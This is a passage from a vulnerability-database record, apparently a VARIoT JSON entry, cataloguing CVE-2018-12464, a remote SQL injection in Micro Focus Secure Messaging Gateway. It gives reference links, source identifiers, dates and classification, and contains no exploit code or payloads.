        "url": "https://www.exploit-db.com/exploits/45083/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12464"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12464"
      },
      {
        "trust": 0.3,
        "url": "https://www.exploit-db.com/exploits/45083"
      },
      {
        "trust": 0.3,
        "url": "https://www.microfocus.com/products/secure-messaging-gateway/"
      },
      {
        "trust": 0.3,
        "url": "https://www.microfocus.com"
      },
      {
        "trust": 0.1,
        "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023132\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12465"
      },
      {
        "trust": 0.1,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023133\u0027]"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-06-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "date": "2018-06-27T00:00:00",
        "db": "BID",
        "id": "106343"
      },
      {
        "date": "2018-09-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "date": "2018-07-31T14:49:49",
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "date": "2018-07-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      },
      {
        "date": "2018-06-29T16:29:00.277000",
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "date": "2018-06-27T00:00:00",
        "db": "BID",
        "id": "106343"
      },
      {
        "date": "2018-09-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "date": "2019-10-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      },
      {
        "date": "2024-11-21T03:45:16.117000",
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Micro Focus Secure Messaging Gateway In  SQL Injection vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "sql injection",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ],
    "trust": 0.7
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2018-12464 (GCVE-0-2018-12464)

Vulnerability from cvelistv5

ghsa-qx98-cwxc-vrv6

Vulnerability from github

fkie_cve-2018-12464

Vulnerability from fkie_nvd

cnvd-2018-12540

Vulnerability from cnvd

gsd-2018-12464

Vulnerability from gsd

var-201806-1215

Vulnerability from variot

Tags

Sightings

Nomenclature